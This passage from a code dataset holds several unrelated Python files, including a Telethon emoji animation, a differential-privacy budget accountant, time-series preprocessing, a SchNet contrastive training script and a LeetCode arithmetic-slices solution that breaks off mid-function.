multi_networks,\n#-------------------------------------------#\n# Loads the file \"path\", extracts the informations\n# to run the function multi_networks() with the\n# correct parameters, and global_path contains the\n# weights of the networks for each simulation.\n# Raise an exception if the path is incorrect.\n#-------------------------------------------#\n# What do we want about the weights ?\n# --> to update the networks' weights\n# we arrange the global_load into a list of weights,\n# orderer by increasing number of simulation, then\n# by increasing id_network, so at each new simulation\n# we just have to pop the begining of global_load into\n# the networks' weights\n#===========================================#\n\ndef load(path):\n g.global_load = []\n if os.path.isfile(path) : # the file exists\n npzfile = np.load(path) # this doesn't load in the correct order, so we have to reorder it\n _load = ['arr_{}'.format(i) for i in range(len(npzfile.files))] # reordered\n g.global_load = [npzfile[i] for i in _load] # loaded in good order\n\n # extracting the header # When the header is extracted, the weights remain and will be load during the multi_networks() function \n # --------------------- # because we need the instantiated networks to update their weights.\n params = []\n for i in range(6): # concerns all the \"global_***_arrays\"\n params.append(g.global_load.pop(0))\n _load = g.global_load.pop(0) # It concatenates with an array which contains: user_name, g.nb_networks, game_name, game_observation_size, game_decision_size, max_score, nb_epochs, nb_simulations, save_frequency, rl_gamma and rl_epsilon.\n params.append(_load[0]) # user\n params.append(_load[1]) # game\n params.append(int(_load[2])) # observation_size\n params.append(int(_load[3])) # decision_size\n params.append(int(_load[4])) # max_score\n params.append(int(_load[5])) # nb_epochs\n params.append(int(_load[6])) # nb_simulations\n params.append(int(_load[7])) # save_freq\n params.append(float(_load[8])) # rl_gamma\n params.append(float(_load[9])) # rl_epsilon\n params += [True] # Last parameter: was_loaded = True.\n # --------------------- header extracted\n \n return params\n else:\n raise Exception('Uncorrect path to load')\n \n \n","sub_path":"neuronit/back_end/save_and_load.py","file_name":"save_and_load.py","file_ext":"py","file_size_in_byte":4918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"103726348","text":"#!/Users/suzinyou/anaconda3/bin/python\n# -*- coding: utf-8 -*-\n\nimport re\n\n\"\"\" Use the following regexes in the order presented. 
\"\"\"\nR_URL = re.compile(r'https?://[-.?&~;+=/#\\w]{1,2076}')\nR_EMAIL = re.compile(r'[-_.0-9A-Za-z]{1,64}@[-_0-9A-Za-z]{1,255}[-_.0-9A-Za-z]{1,255}')\nR_TWT = re.compile(r'(?<=^|(?<=[^a-zA-Z0-9-_\\.]))@([A-Za-z]+[A-Za-z0-9]+)')\nR_HASHTAG = re.compile(r'#[^\\s]+')\n# R_NUMS = re.compile(r'([\\d]+[,.\\-])*[\\d]+')\n# R_SPEC = re.compile(r'[\\,.\\\"¿??¡!!\\-_=+`~〜/\\\\::;|@#$%^&*†‡※°()()\\[\\][]\\{}{}【】《》〈〉<>‹›«»‧•「」『』©™\\u20A0-\\u20CF]+')\n# Note: R_SPEC does NOT include apostrophe (\"\\'\").\n# R_PUNC = re.compile(r'[,.\\'\"¿??¡!]+') # common punctuation marks\nR_WS = re.compile(r'[\\s]+')\n\n\"\"\" Regex for alphabet unicode \"\"\"\nlatin_chars = r'[\\u0041-\\u005A\\u0061-\\u007A\\u00C0-\\u00D6\\u00D8-\\u00F6\\u00F8-\\u00FF]'\nR_LA = re.compile(r'{block}+\\'{block}+|{block}+'.format(block=latin_chars)) # Latin\nR_RU = re.compile(r'[\\u0400-\\u04FF\\u0500-\\u052F]+') # Russian cyrillic\nR_AR = re.compile(r'[\\u0600-\\u06FF\\u0750-\\u077F\\u08A0–\\u08FF\\uFB50–\\uFDFF\\uFE70–\\uFEFF]+') # Arabic\nR_HI = re.compile(r'[\\u0900-\\u097F]+') # Hindi\nR_JA = re.compile(r'[\\u3001\\u3002\\u3041-\\u390f\\u30a0-\\u30ff]+') # Japanese\nR_KO = re.compile(r'[\\u3131-\\u318e\\uac00-\\ud7a3\\u1100-\\u11ff]+') # Korean\nR_ZH = re.compile(r'[\\u4E00-\\u9FFF\\u3400-\\u4DBF\\uF900-\\uFAFF]+')\nR_TH = re.compile(r'[\\u0e01-\\u0e5b]+') # Thai\n\n\"\"\" Dictionary for each language/alphabet-set regex \"\"\"\nlang_range = {'la':R_LA,\n 'ru':R_RU, \n 'ar': R_AR, \n 'hi': R_HI, \n 'zh': R_ZH,\n 'ja': R_JA, \n 'ko': R_KO,\n 'th': R_TH\n}\n","sub_path":"src/unicode_regex.py","file_name":"unicode_regex.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"79270388","text":"\n\n# Edited for FTg by demenkop\n\n\nfrom telethon import events\nimport asyncio\n\n@borg.on(events.NewMessage(pattern=r\"\\.ding\", outgoing=True))\n\nasync def _(event):\n if event.fwd_from:\n return\n\n animation_interval = 0.3\n animation_ttl = range(0, 10)\n input_str = event.pattern_match.group(1)\n animation_chars = [\n \"🔴⬛⬛⬜⬜\\n⬜⬜⬜⬜⬜\\n⬜⬜⬜⬜⬜\",\n \"⬜⬜⬛⬜⬜\\n⬜⬛⬜⬜⬜\\n🔴⬜⬜⬜⬜\",\n \"⬜⬜⬛⬜⬜\\n⬜⬜⬛⬜⬜\\n⬜⬜🔴⬜⬜\",\n \"⬜⬜⬛⬜⬜\\n⬜⬜⬜⬛⬜\\n⬜⬜⬜⬜🔴\",\n \"⬜⬜⬛⬛🔴\\n⬜⬜⬜⬜⬜\\n⬜⬜⬜⬜⬜\", \n \"⬜⬜⬛⬜⬜\\n⬜⬜⬜⬛⬜\\n⬜⬜⬜⬜🔴\",\n \"⬜⬜⬛⬜⬜\\n⬜⬜⬛⬜⬜\\n⬜⬜🔴⬜⬜\",\n \"⬜⬜⬛⬜⬜\\n⬜⬛⬜⬜⬜\\n🔴⬜⬜⬜⬜\",\n \"🔴⬛⬛⬜⬜\\n⬜⬜⬜⬜⬜\\n⬜⬜⬜⬜⬜\",\n \"⬜⬜⬜⬜⬜\\n⬜ [Demenkop](http://t.me/demenkop) ⬜\\n⬜⬜⬜⬜⬜\"\n ]\n for i in animation_ttl:\n await asyncio.sleep(animation_interval)\n await event.edit(animation_chars[i % 10])\n","sub_path":"ding.py","file_name":"ding.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"632936081","text":"\nimport numpy as np\nimport copy\nimport math\n\nfrom tensorflow_privacy.privacy.analysis import compute_dp_sgd_privacy_lib\n\nclass BudgetsAccountant:\n def __init__(self, N, eps_list, delta, noise_multiplier, comm_gap, priv_threshold, accumulation=None):\n self._init = copy.deepcopy(eps_list)\n self._public = list(np.where(np.array(self._init) >= priv_threshold)[0])\n self._private = list(set(range(N)).difference(set(self._public)))\n self._remainder = copy.deepcopy(eps_list)\n\n if accumulation is None:\n self._accumulation = [0] * N\n else:\n self._accumulation = accumulation\n\n self._step_accum = [0] * N\n self._tmp_accum = [0] * N\n self._delta = delta\n self._tmp_delta = [0] * N\n self._round = [0] * N\n self._comm_gap = comm_gap\n self._finished = [False] * N\n self._noise_multiplier 
= noise_multiplier\n self._global_budgets = []\n\n def set_finished(self, client_id):\n self._finished[client_id] = True\n\n def get_finished(self):\n return self._finished\n\n def precheck(self, N, client_set, batch_size):\n idx = np.where(np.array(self._finished) == False)[0].tolist()\n s = []\n\n for c in idx:\n\n tmp_round = self._round[c] + self._comm_gap\n# if self._step_accum[c] == 0:\n '''\n tmp_delta, _ = compute_dp_sgd_privacy_lib.compute_dp_sgd_privacy(\n len(client_set[c]), FLAGS.client_batch_size, self._noise_multiplier[c],\n tmp_round * int(FLAGS.client_epochs_per_round), eps=self._init[c]/FLAGS.max_comm_round)\n '''\n '''\n tmp_accum, _ = compute_dp_sgd_privacy_lib.compute_dp_sgd_privacy(\n len(client_set[c]), batch_size, self._noise_multiplier[c],\n tmp_round, float(self._delta))\n '''\n q = batch_size*1.0 / len(client_set[c])\n# print(q, tmp_round)\n tmp_accum = 10 * q * math.sqrt(tmp_round*(-math.log10(self._delta))) / self._noise_multiplier[c]\n #tmp_accum = tmp_round * self._step_accum[c]\n# print(c, tmp_accum)\n if tmp_accum > self._init[c]:\n self.set_finished(c)\n else:\n s.append(c)\n self._tmp_accum[c] = tmp_accum\n #self._tmp_accum[c] = (self._init[c]/FLAGS.max_comm_round)*tmp_round\n #self._tmp_delta[c] = self._delta\n #print(s)\n return s\n\n def get_remainder(self):\n return self._remainder\n\n def get_accumulation(self, client_id):\n return self._accumulation[client_id]\n\n def set_global_budget(self):\n self._global_budgets.append(min(self._accumulation))\n\n def get_global_budget(self):\n return self._global_budgets\n\n def update(self, clients_id):\n #print('update: ', clients_id) \n for c in clients_id:\n self._round[c] += self._comm_gap\n self._remainder[c] = self._init[c]-self._tmp_accum[c]\n self._accumulation[c] = self._tmp_accum[c]\n self._tmp_accum[c] = 0\n\n\n self.set_global_budget()\n #print('global_budgets:', self._global_budgets)\n \n","sub_path":"budgets_accountant.py","file_name":"budgets_accountant.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"150387012","text":"import pandas as pd\nfrom ggplot import *\nfrom numpy import nan\nfrom test import U_test\nfrom dmath import shannon\nfrom dmath import dshannon\n\n'''\n对所选择的列进行描述性统计\n:return dict\n@data 数据,格式要求列表或者DataFrame\n@colname 要统计的列名\n@dtype 数据类型,continuous 或者 discrete,默认为continuous.\n@stat 统计内容,means:基本统计包含 最大值,最小值,均值,标准差,空缺值频数,以及分布图,默认为means\n@NaNaction 空缺值的处理方式,N:忽略,默认为忽略.\n@p 打印输出:0~不打印,~打印,默认为打印.\n'''\ndef feature_stater(data,colname,dtype=\"continuous\",stat=\"means\",NaNaction=\"n\",p=1,**kwargs):\n if data.__class__==list:\n data=pd.DataFrame(data)\n if NaNaction.lower()==\"n\":\n if dtype.lower()==\"continuous\":\n return draw_ctn(data,colname,stat=stat,p=p,**kwargs)\n elif dtype.lower()==\"discrete\":\n return draw_dsct(data,colname,p=p,stat=stat)\n else:\n print(\"please convert to list or DataFrame\")\n\n\n'''\n对连续类型的列进行描述性统计\n:return dict\n@data 数据,格式要求列表或者DataFrame\n@colname 要统计的列名\n@stat 统计内容,means:基本统计包含 最大值,最小值,均值,标准差,空缺值频数,空缺值比例,以及分布图,默认为means\n@p 打印输出:0~不打印,~打印,默认为打印.\n\n'''\ndef draw_ctn(data,colname,stat=\"means\",p=1,**kwargs):\n v = data[colname]\n if stat.lower()==\"means\":\n d = {}\n d[\"dtype\"] = v.dtype\n d[\"max\"] = v.max()\n d[\"min\"] = v.min()\n d[\"mean\"] = v.mean()\n d[\"std\"] = v.std()\n d[\"skew\"]=v.skew()\n d[\"kurt\"]=v.kurt()\n valueNull=v.isnull().value_counts()\n if True in valueNull.index:\n d[\"NA\"]=valueNull[True]\n else:\n d[\"NA\"]=0\n 
d[\"NArate\"]=d[\"NA\"]/v.shape[0]\n if p:\n print(d)\n print(ggplot(data, aes(x=colname)) + geom_bar(binwidth=kwargs.get(\"binwidth\", (d[\"max\"] - d[\"min\"]) / 10),stat=\"identity\"))\n return d\n\n\n'''\n对离散类型的列进行描述性统计\n:return dict\n@data 数据,格式要求列表或者DataFrame\n@colname 要统计的列名\n@stat 统计内容,means:基本统计包含 最大值,最小值,均值,标准差,空缺值频数,以及分布图,默认为means\n@p 打印输出:0~不打印,1~打印,默认为打印.\n\n'''\ndef draw_dsct(data, colname,stat=\"means\",p=1):\n v=data[colname]\n if stat.lower()==\"means\":\n vount = v.value_counts()\n d = {}\n d[\"dtype\"] = v.dtype\n d[\"maxId\"] = vount.idxmax()\n d[\"max\"]=vount.max()\n d[\"minId\"]=vount.idxmin()\n d[\"min\"] = vount.min()\n d[\"mean\"] = vount.mean()\n d[\"std\"] = vount.std()\n d[\"skew\"]=vount.skew()\n d[\"kurt\"]=vount.kurt()\n\n valueNull=v.isnull().value_counts()\n if True in valueNull.index:\n d[\"NA\"]=valueNull[True]\n else:\n d[\"NA\"]=0\n d[\"NArate\"]=d[\"NA\"]/v.shape[0]\n\n if p:\n print(d)\n print(ggplot(data, aes(x=colname)) + geom_bar(stat=\"bin\"))\n return d\n\n#0单边,1双边\n\n\n'''\n对所选择的列进行描述性统计\n:return three dict dx~x的统计值,dy~y的统计值,dxy~xy的统计值\n@data 数据:DataFrame.\n@xlabel,ylabel 要比较的两个列列名:String/int.\n@xtype,ytype 对应两列的数据类型:\"continuous\" 或者 \"discrete\",默认为\"continuous\".\n@stat 统计内容:\"means\"~基本统计包含 最大值,最小值,均值,标准差,空缺值频数,以及分布图,默认为\"means\".\n@NaNaction 空缺值的处理方式:\"N\"~忽略,默认为忽略.\n@p 打印输出:0~不打印,1~打印,默认为1.\n\n'''\ndef feature_discribler(data,xlabel,ylabel=0,xtype=\"continuous\",ytype=\"continuous\",stat=\"means\",NaNaction=\"n\",p=1,**kwargs):\n if data.__class__==list:\n data=pd.DataFrame(data)\n if NaNaction.lower()==\"n\":\n #查看两个变量的基本情况。\n dx=feature_stater(data, xlabel, xtype, stat, NaNaction,p=p,**kwargs)\n input()\n dy=feature_stater(data,ylabel,ytype,stat,NaNaction,p=p,**kwargs)\n input()\n p=ggplot(data,aes(x=xlabel,y=ylabel))\n if xtype.lower()==\"continuous\" and ytype.lower()==\"continuous\":\n dxy={}\n dxy[\"corr\"]=data[xlabel].corr(data[ylabel],method=kwargs.get(\"corr_method\",\"pearson\"))\n if p:\n print(dxy)\n print(p+geom_point())\n if xtype.lower()==\"discrete\" and ytype.lower()==\"discrete\":\n dxy={}\n\n dx[\"shanon\"]=shannon(data[xlabel],**kwargs)\n dy[\"shanon\"]=shannon(data[ylabel],**kwargs)\n dxy[\"ySx\"]=dshannon(data,ylabel,xlabel)\n dxy[\"xSy\"]=dshannon(data,xlabel,ylabel)\n\n if p:\n print(dxy)\n print(p+geom_point())\n\n if xtype.lower()==\"discrete\" and ytype.lower()==\"continuous\":\n dxy={}\n dx[\"shannon\"]=shannon(data[xlabel],**kwargs)\n #显著性检验,U检验\n split_by_x=data[xlabel].value_counts().index.map(lambda x: data[ylabel][data[xlabel] == x])\n dxy[\"xUy\"]=split_by_x.map(lambda x:U_test(x,data[xlabel]))\n\n if p:\n print(dxy)\n print(p+geom_boxplot())\n\n if ytype.lower()==\"continuous\" and ytype.lower()==\"discrete\":\n dxy={}\n dy[\"shannon\"]=shannon(data[ytype])\n #显著性检验,U检验\n split_by_y = data[ylabel].value_counts().index.map(lambda x: data[xlabel][data[ylabel] == x])\n dxy[\"yUx\"] = split_by_y.map(lambda x: U_test(x, data[ylabel]))\n\n if p:\n print(dxy)\n print(p+geom_point())\n else:\n print(\"please convert to list or DataFrame\")\n\n\ndef data_discribler(data,head=5,tail=5,corr_method=\"pearson\",NaNaction=\"N\"):\n print(\"data's head:\")\n print(data.head(head))\n\n print(\"data's tail\")\n print(data.tail(tail))\n\n print(\"cor matrix of nson\")\n corr=data.corr(corr_method)\n if nan in corr:\n print(\"Wrong!! 
nan in data\")\n print(corr)\n\n\n\n","sub_path":"python/python/data_discrible.py","file_name":"data_discrible.py","file_ext":"py","file_size_in_byte":6173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"160923709","text":"import time, pandas as pd, numpy as np\nfrom pandas import Series\nfrom sklearn.preprocessing import MinMaxScaler\n\n\npd.set_option('display.max_columns', 100)\n\ntime_sequence_length_per_sample = 500\n\n\n\n\n'''method to create a differenced series to make the time-series data stationary'''\ndef difference(timeseries, interval=1): #shape of timeseries is (2499399, 1)\n\n diff = list()\n '''Converting pandas dataframe to numpy array so that we can reshape'''\n timeseries = timeseries.values\n timeseries = timeseries.reshape((-1,1))\n for i in range(interval, len(timeseries)):\n\n\n #print(timeseries[i-interval])\n\n value = timeseries[i] - timeseries[i - interval]\n\n diff.append(value)\n\n\n '''Check if the differencing happended properly or not'''\n\n if (timeseries[1]-timeseries[0] != diff[0] and timeseries[2]-timeseries[1] != diff[1] ):\n print(\"difference() method did not function as required in preprocessing_bitcoin.py file.\")\n print(\"The first two difference values are: \", diff[0], diff[1])\n\n return Series(diff)\n\n\n\n'''method to reverse the differenced series to recover the original values'''\ndef inverse_difference(history, yhat, interval):#bitcoin_price_csv, differenced[i], len(bitcoin_price_csv) - i\n return yhat + history.iloc[-interval]\n\n'''No, linear transformations of the response/ target regression values are never necessary.'''\n\n\n\n'''scale train and test features to [-1, 1]'''\ndef scale(features):\n print(\"Scaling the features of the timeseries.\\n\")\n\n scaler = MinMaxScaler(feature_range=(-1, 1)) #Transforms features( axis = 0) by scaling each feature to a given range.\n scaler = scaler.fit(features)\n # transform train\n features = features.reshape(features.shape[0], features.shape[1])\n train_and_test_features_scaled = scaler.transform(features)\n\n '''You need to apply normalisation to test data features, if your algorithm works with or needs normalised training data.\n The scaling is also a representation of the input.\n Not only do you need normalisation, but you should apply the exact same scaling as for your training data.\n However, note that you do not have to scale the labels.\n '''\n return scaler, train_and_test_features_scaled\n\n\n'''Reverse scaling for a forecasted value'''\ndef invert_scale(scaler, X, value):\n new_row = [x for x in X] + [value]\n array = np.array(new_row)\n array = array.reshape(1, len(array))\n inverted = scaler.inverse_transform(array)\n return inverted[0, -1]\n\ndef build_final_csv_for_cpu_usage(time_sequence_length):\n\n path_to_combined_dataset_with_no_head_or_tail = \"../data/final_cpu_usage.csv\"\n\n cpu_usage_csv = pd.read_csv(path_to_combined_dataset_with_no_head_or_tail,header=None, index_col= None) # load the data set -make sure u read with header = None....IMP here\n\n '''make the data stationary'''\n differenced_bitcoin_price = difference(cpu_usage_csv, 1)\n\n '''Check to see if the inverse method works or not'''\n inverted = list()\n for i in range(len(differenced_bitcoin_price)):\n\n value = inverse_difference(cpu_usage_csv, differenced_bitcoin_price[i], len(cpu_usage_csv) - i)#history, yhat, interval=1\n inverted.append(value)\n inverted = Series(inverted)\n print(\"Inverted head: (does not contain the first sample of the time 
series.)\\n \",inverted.head())\n\n '''use the differenced data for timeseries prediction'''\n cpu_usage_csv = np.array(differenced_bitcoin_price)\n\n #In pandas, indices are supposed to be immutable\n\n\n '''Convert the time-series problem into a supervised learning problem'''\n timeseries_dataset_sequence= []\n timeseries_dataset_labels= []\n\n\n#-----------------------------------------------------------training dataset\n for i in range(len(cpu_usage_csv)):\n\n timeseries_dataset_temp = np.zeros((time_sequence_length))\n\n if i < len(cpu_usage_csv) - time_sequence_length:\n for j in range(time_sequence_length):\n timeseries_dataset_temp[j] = (cpu_usage_csv[i + j])\n\n timeseries_dataset_sequence.append(timeseries_dataset_temp)\n\n timeseries_dataset_labels.append(cpu_usage_csv[i + time_sequence_length])\n\n\n\n\n timeseries_dataset_sequence = np.array(timeseries_dataset_sequence)\n\n\n\n timeseries_dataset_labels = np.array(timeseries_dataset_labels)\n\n\n\n\n '''scale the features before stacking with the regression labels'''\n scaler, timeseries_dataset_sequence = scale(timeseries_dataset_sequence)\n\n print(timeseries_dataset_sequence.shape) #354, 10\n print(timeseries_dataset_labels.shape) #354,\n '''stack the scaled features with unscaled targets'''\n final_training_and_testing_dataset = np.column_stack((timeseries_dataset_sequence, timeseries_dataset_labels))\n\n\n '''Let us comment the following line and make the dataset not shuffled by default.'''\n #np.random.shuffle(final_training_and_testing_dataset)\n\n\n print(\"final_bitcoin_price_data_after_preprocessing shape\", final_training_and_testing_dataset.shape) #(2499299, 101), 100 less than 2499399\n np.savetxt(\"../data/cpu_usage_after_preprocessing_500_timesteps.csv\", final_training_and_testing_dataset, delimiter=\",\")\n\n\n\n\n print(\"Dataset creation completed successfully.\\n\")\n\n#----------------------------VVI the op is shhuffled so the order is not preserved but everything is still correct--------------\n\nif __name__ == \"__main__\":\n build_final_csv_for_cpu_usage(time_sequence_length_per_sample)\n","sub_path":"CPU_Usage/preprocessing_fourth_step_DONOT_USE.py","file_name":"preprocessing_fourth_step_DONOT_USE.py","file_ext":"py","file_size_in_byte":5504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"57290831","text":"__author__ = 'lunahc'\n\nData = [{'x':0, 'y':22},\n {'x':3, 'y':21},\n {'x':6, 'y':19},\n {'x':9, 'y':24},\n {'x':12, 'y':28},\n {'x':15, 'y':29},\n {'x':18, 'y':26},\n {'x':21, 'y':24},\n {'x':24, 'y':21}] # 08/29 서울시 강남구 시간별 기온\n\nclass Graph:\n def __init__(self, sizeX, sizeY):\n import turtle\n self.T = turtle.Turtle()\n screen = self.T.getscreen()\n screen.setworldcoordinates(-sizeX, -sizeY, sizeX, sizeY)\n\n def draw_graph(self, data):\n self.Teleport(data[0]['x'], data[0]['y'])\n for i in data:\n self.T.goto(i['x'], i['y'])\n\n def Teleport(self, x, y):\n self.T.up()\n self.T.goto(x, y)\n self.T.down()\n\nT = Graph(24, 30)\nT.draw_graph(Data)","sub_path":"Day4/TurtleGraph.py","file_name":"TurtleGraph.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"47103076","text":"from setuptools import setup\n\nwith open('README.md', 'rt') as f:\n long_description = f.read()\n\nsetup(name='scibot',\n version='0.0.2',\n description='curation workflow automation and coordination',\n long_description=long_description,\n 
long_description_content_type='text/markdown',\n url='https://github.com/SciCrunch/scibot',\n author='Tom Gillespie',\n author_email='tgbugs@gmail.com',\n license='Apache 2.0',\n classifiers=[],\n keywords='rrid curation biocuration hypothesis hypothes.is web annotation',\n packages=['scibot'],\n install_requires=[\n 'curio',\n 'docopt',\n 'flask',\n 'gevent',\n 'gunicorn',\n 'hyputils',\n 'lxml',\n 'pyontutils>=0.0.5',\n ],\n extras_require={},\n scripts=['bin/scibot-bookmarklet', 'bin/scibot-dashboard'],\n entry_points={\n 'console_scripts': [\n 'scibot-sync=scibot.sync:main'\n ],\n },\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"653152002","text":"import torch\nimport torch.nn as nn\nimport torch_geometric\nimport numpy as np\nimport datetime\nimport scipy\nimport gzip\nimport math\nimport rdkit\nimport rdkit.Chem\nfrom rdkit.Chem import TorsionFingerprints\nfrom collections import defaultdict\nimport pandas as pd\nfrom tqdm import tqdm\nfrom copy import deepcopy\nimport random\n\nimport os\nimport sys\nimport json\nfrom model.params_interpreter import string_to_object \n\nfrom model.gnn_3D.schnet import SchNet\nfrom model.gnn_3D.dimenet_pp import DimeNetPlusPlus\nfrom model.gnn_3D.spherenet import SphereNet\n\nfrom torch_geometric.nn.acts import swish\n\nfrom model.gnn_3D.train_functions import classification_loop, contrastive_loop, binary_ranking_regression_loop\n\nfrom model.gnn_3D.train_models import train_classification_model, train_contrastive_model, train_binary_ranking_regression_model\n\nfrom model.datasets_samplers import Dataset_3D_GNN, StereoBatchSampler, SiameseBatchSampler, Sample_Map_To_Positives, Sample_Map_To_Negatives, NegativeBatchSampler, SingleConformerBatchSampler\n\nimport sklearn\n\nargs = sys.argv\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nprint('reading data...')\n\n# READ HYPERPARAMETERS\nwith open(str(args[1])) as f: # args[1] should contain path to params.json file\n params = json.load(f)\n\nseed = params['random_seed']\nrandom.seed(seed)\nnp.random.seed(seed = seed)\ntorch.manual_seed(seed)\n \ntrain_dataframe = pd.read_pickle(params['train_datafile'])\nval_dataframe = pd.read_pickle(params['validation_datafile'])\n\nif params['select_N_enantiomers']: # number of enantiomers to include for training; default = null \n smiles_nostereo = list(set(train_dataframe.SMILES_nostereo))\n random.shuffle(smiles_nostereo)\n select_smiles_nostereo = smiles_nostereo[0:params['select_N_enantiomers']]\n train_dataframe = train_dataframe[train_dataframe.SMILES_nostereo.isin(select_smiles_nostereo)].sort_values('SMILES_nostereo').reset_index(drop = True)\n\n\n# CREATE DIRECTORY FOR SAVING/CHECKPOINTING\nsave = params['save']\n\nPATH = args[2] # should contain path to subfolder where files will be saved\nif PATH[-1] != '/':\n PATH = PATH + '/'\n\nif not os.path.exists(PATH) and save == True:\n os.makedirs(PATH)\n\n#CREATE MODEL\nrandom.seed(seed)\nnp.random.seed(seed = seed)\ntorch.manual_seed(seed)\n\nprint('creating model...')\n\nmodel = SchNet(hidden_channels = params['hidden_channels'], # 128\n num_filters = params['num_filters'], # 128\n num_interactions = params['num_interactions'], # 6\n num_gaussians = params['num_gaussians'], # 50\n cutoff = params['cutoff'], # 10.0\n max_num_neighbors = params['max_num_neighbors'], # 32\n out_channels = params['out_channels'], # 1\n readout = 
'add',\n dipole = False,\n mean = None,\n std = None,\n atomref = None, \n MLP_hidden_sizes = [], # [] for contrastive\n )\n\nif params['pretrained'] != \"\":\n print('loading pretrained weights...')\n model.load_state_dict(torch.load(params['pretrained'], map_location=next(model.parameters()).device), strict=False)\n\nmodel.to(device)\n\n# DEFINE OPTIMIZERS\nlr = params['lr']\noptimizer = torch.optim.Adam(filter(lambda p: p.requires_grad, model.parameters()), lr = lr)\n\n# Choosing Loss\nloss_function = params['loss_function']\n\n# only for contrastive learning\nmargin = params['margin']\n\n# only for docking\nabsolute_penalty = params['absolute_penalty'] # default is 1.0\nrelative_penalty = params['relative_penalty'] # default is None (null). If a float >=0.0, we have to use a SiameseBatchSampler\n\n# BUILDING DATA LOADERS\nbatch_size = params['batch_size']\n\n# only for SiameseBatchSampler\nN_pos = params['N_pos']\nN_neg = params['N_neg']\nstratified = params['stratified']\nwithoutReplacement = params['withoutReplacement']\n\n# only for StereoBatchSampler\ngrouping = params['grouping'] # one of ['none', 'stereoisomers', 'graphs']\n\n# selecting iteration style\nif params['iteration_mode'] == 'stereoisomers':\n single_conformer_train_dataframe = train_dataframe.groupby('ID').sample(1)\n single_conformer_val_dataframe = val_dataframe.groupby('ID').sample(1)\n \n BatchSampler_train = SingleConformerBatchSampler(single_conformer_train_dataframe,\n train_dataframe, \n batch_size,\n N_pos = N_pos,\n N_neg = N_neg, \n withoutReplacement = withoutReplacement, \n stratified = stratified)\n\n BatchSampler_val = SingleConformerBatchSampler(single_conformer_val_dataframe,\n val_dataframe, \n batch_size,\n N_pos = N_pos,\n N_neg = N_neg, \n withoutReplacement = withoutReplacement, \n stratified = stratified)\n \nelif params['iteration_mode'] == 'conformers':\n BatchSampler_train = SiameseBatchSampler(train_dataframe, \n batch_size,\n N_pos = N_pos,\n N_neg = N_neg, \n withoutReplacement = withoutReplacement, \n stratified = stratified)\n\n BatchSampler_val = SiameseBatchSampler(val_dataframe, \n batch_size,\n N_pos = N_pos,\n N_neg = N_neg, \n withoutReplacement = withoutReplacement, \n stratified = stratified)\n \n\ntrain_dataset = Dataset_3D_GNN(train_dataframe, \n regression = '', # top_score, RS_label_binary, sign_rotation\n )\n\nval_dataset = Dataset_3D_GNN(val_dataframe, \n regression = '', # top_score, RS_label_binary, sign_rotation\n )\n\nnum_workers = params['num_workers']\ntrain_loader = torch_geometric.data.DataLoader(train_dataset, batch_sampler = BatchSampler_train, num_workers = num_workers)\nval_loader = torch_geometric.data.DataLoader(val_dataset, batch_sampler = BatchSampler_val, num_workers = num_workers)\n\n\n# BEGIN TRAINING\nweighted_sum = params['weighted_sum'] # only for StereoBatchSampler\n\nif not os.path.exists(PATH + 'checkpoint_models') and save == True:\n os.makedirs(PATH + 'checkpoint_models')\n\nN_epochs = params['N_epochs']\n\ntrain_contrastive_model(model, \n train_loader, \n val_loader, \n N_epochs = N_epochs, \n optimizer = optimizer, \n device = device, \n loss_function = loss_function, \n batch_size = batch_size, \n margin = margin, \n save = save, \n PATH = PATH)\n\nprint('completed process')\n","sub_path":"training_scripts/training_contrastive_schnet.py","file_name":"training_contrastive_schnet.py","file_ext":"py","file_size_in_byte":7375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} 
+{"seq_id":"135295007","text":"\"\"\"\nArithmetic Slices II - Subsequence\nGiven an integer array nums, return the number of all the arithmetic subsequences of nums.\n\nA sequence of numbers is called arithmetic if it consists of at least three elements and if the difference between any two consecutive elements is the same.\n\nFor example, [1, 3, 5, 7, 9], [7, 7, 7, 7], and [3, -1, -5, -9] are arithmetic sequences.\nFor example, [1, 1, 2, 5, 7] is not an arithmetic sequence.\nA subsequence of an array is a sequence that can be formed by removing some elements (possibly none) of the array.\n\nFor example, [2,5,10] is a subsequence of [1,2,1,2,4,1,5,10].\nThe test cases are generated so that the answer fits in 32-bit integer.\n\n\n\nExample 1:\n\nInput: nums = [2,4,6,8,10]\nOutput: 7\nExplanation: All arithmetic subsequence slices are:\n[2,4,6]\n[4,6,8]\n[6,8,10]\n[2,4,6,8]\n[4,6,8,10]\n[2,4,6,8,10]\n[2,6,10]\nExample 2:\n\nInput: nums = [7,7,7,7,7]\nOutput: 16\nExplanation: Any subsequence of this array is arithmetic.\n\n\nConstraints:\n\n1 <= nums.length <= 1000\n-231 <= nums[i] <= 231 - 1\n\"\"\"\nfrom collections import Counter, defaultdict\nfrom typing import List\n\n\nclass Solution:\n def numberOfArithmeticSlices(self, nums: List[int]) -> int:\n # Solution 1 - 1196 ms\n \"\"\"\n total, n = 0, len(nums)\n dp = [Counter() for item in nums]\n for i in range(n):\n for j in range(i):\n dp[i][nums[i] - nums[j]] += (dp[j][nums[i] - nums[j]] + 1)\n total += sum(dp[i].values())\n\n return total - (n - 1) * n // 2\n \"\"\"\n # Solution 2 - 128 ms\n positions = defaultdict(list)\n n = len(nums) - 1\n for i, a in enumerate(reversed(nums)):\n positions[a].append(n - i)\n previous = defaultdict(int)\n subseqs = [defaultdict(int) for _ in range(len(nums))]\n for i, a in enumerate(nums):\n del positions[a][-1]\n if not positions[a]:\n del positions[a]\n if 